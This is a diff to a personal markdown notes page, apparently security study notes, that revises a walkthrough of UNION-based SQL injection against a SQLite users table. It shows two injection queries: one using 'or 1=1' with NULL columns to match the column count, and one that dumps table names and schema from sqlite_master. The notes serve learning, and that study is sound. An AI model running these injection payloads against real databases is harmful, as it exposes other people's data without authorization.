blnknlights/blnknlights.github.io/docs/source/other/dba/dba.md

 +-------+----------------+-------------------------------+
 ```

-Confirm we have 3 columns with NULL, NULL, NULL, but we know we do.
+Confirm we have 3 columns with NULL,NULL,NULL, but we know we do.
-Then try to do a UNION of type,name,sql from `sqlite_master` into users
+We now need to do an UNION of `sqlite_master` into users,
+but we only have 3 columns so we can choose just what matters, e.g: type,name,sql.
 ```sql
 select username,role,email from users where username == 'admin' or 1=1 UNION SELECT NULL,NULL,NULL --';
 select username,role,email from users where username == 'admin' or 1=1 UNION SELECT type,name,sql FROM sqlite_master --';